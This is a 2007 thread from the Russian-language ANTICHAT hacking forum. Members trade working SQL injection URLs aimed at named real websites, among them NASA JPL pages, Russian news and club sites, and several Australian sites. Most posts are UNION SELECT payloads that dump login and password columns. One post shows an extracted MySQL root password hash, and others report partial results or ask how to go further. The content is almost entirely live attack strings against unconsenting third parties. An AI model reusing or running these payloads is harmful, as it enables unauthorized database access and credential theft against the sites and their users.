HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.08.2007, 03:21
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


По умолчанию

вроде не баян, пока на ачате искал, нашел чето похожее, но решил раскрыть тему, к томуже инъекция в другом скрипте:
Код:
http://www-robotics.jpl.nasa.gov/news/newsStory.cfm?NewsID=-69%20union%20select%201,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71),11,12,13,14,15%20from%20mysql.user/*
root:*1CB7A709BB1423D94D5F2C14E2E929F17BEBF122
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #2  
Старый 30.08.2007, 06:57
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
По умолчанию

http://www.elephant.ru/index.php?item=3891+union+select+version(),2,datab ase(),user(),5,6,7,8,9,10,11,12,13,14,15,16/*

elephantru@localhost
elephantru
4.1.22-standard-log
дальше не раскопал :-/
 
Ответить с цитированием

  #3  
Старый 30.08.2007, 16:14
t00th
Banned
Регистрация: 15.07.2007
Сообщений: 39
Провел на форуме:
1122110

Репутация: 43
По умолчанию

Цитата:
Сообщение от Calcutta  
http://www.elephant.ru/index.php?item=3891+union+select+version(),2,datab ase(),user(),5,6,7,8,9,10,11,12,13,14,15,16/*

elephantru@localhost
elephantru
4.1.22-standard-log
дальше не раскопал :-/
http://www.elephant.ru/index.php?item=3891+union+select+1,2,concat(name,0 x3a,login,),4,5,6,7,8,9,10,11,12,13,14,15,16+from+ users/*
 
Ответить с цитированием

  #4  
Старый 30.08.2007, 13:24
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

СПОРТклуб
Код:
http://www.sportclub.ru/news.php?id=-46+UNION+SELECT+1,2,3,concat(login,char(58),password),concat(user(),char(58),version(),char(58),database()),6,7,8,9+from+users+--+
После того как я зашел на форум, интерес к сайту пропал...
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #5  
Старый 30.08.2007, 13:39
iRedX
Участник форума
Регистрация: 18.06.2002
Сообщений: 126
Провел на форуме:
65642

Репутация: 46
По умолчанию

motofan.ru

http://top.motofan.ru/index.php?act=faq

в поле поиска вставить: '/**/and/**/1=2/**/union/**/select/**/version(),database(),user()/*
 
Ответить с цитированием

  #6  
Старый 30.08.2007, 14:27
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
По умолчанию

irkutsk.rfn.ru
http://irkutsk.rfn.ru/rnews.html?id=23639+order+by+11--&cid=7

Дальше не смог... UNION не работает =(
 
Ответить с цитированием

  #7  
Старый 30.08.2007, 16:42
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

информационное агенство
4 мускул
код:
http://www.context-ua.com/km/forum1 .php?act=forum add&botn=456&top=-4' +union+ select+ 1 ,2 ,con cat(lo gin,pas s),4 ,5 ,6 +from+users/*

дальше не смог
 
Ответить с цитированием

  #8  
Старый 30.08.2007, 21:47
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


По умолчанию

http://soc.jpl.nasa.gov/experience/gallery-story.cfm?id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,char( 47)%2bchar(47)%2bchar(45)%2bchar(45)%2bchar(62)%2b char(60)%2bchar(98)%2bchar(114)%2bchar(62)%2bchar( 60)%2bchar(47)%2bchar(101)%2bchar(109)%2bchar(62)% 2bemail%2bchar(58)%2bpassword%2bchar(60)%2bchar(33 )%2bchar(45)%2bchar(45),11,null,13,14,15,char(16), char(17),null,19,20%20from%20usersmember--s
 
Ответить с цитированием

  #9  
Старый 30.08.2007, 22:51
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://www.onlymelbourne.com.au/melbourne_details.php?id=-1+union+select+1,2,3,concat(admin_id,char(58),pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43,44,45+from+admin/*
не смог подобрать имя юзверя


http://www.gertrude.org.au/exhibition.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/*
тут вообще хрен знает какая таблица

http://www.defenceandindustry.com.au/category.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat( username,char(58),password),0x17),0x17),4,5,6,7,8, 9,10,11,12,13+from+users/*
какие это юзеры - хрен знает

http://www.strawtec.com.au/content.php?id=-1+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENC RYPT(concat(username,char(58),password),0x17),0x17 ),10,11,12+from+users/*
тоже самое непонятно откуда пароли

http://www.via-rs.net/acontece/index.php?inc=categoria&cod_categoria=-1+union+select+concat(mail,char(58),password)+from +survey_admin/*

Последний раз редактировалось Termin@L; 30.08.2007 в 22:57..
 
Ответить с цитированием

  #10  
Старый 31.08.2007, 02:22
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

вот такой вот ужаснейший скуль я нашел

код:

http://www.whoiswho.crimea.ua/view_org.php?record=-1385'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80, 81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97 ,98,99,100,101,102,103,104,105,106,107,108,109,110 ,111,112,113,114,115,116,117,118,119,120,121,122,1 23,124,125,126,127,128,129,130,131,132,133,134,135 ,136,137,138,139,140,141,142,143,144,145,146,147,1 48,149,150,151,152,153,154,155,156,157,158,159,160 ,161,162,163,164,165,166,167/*

и что с этим можно сделать?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.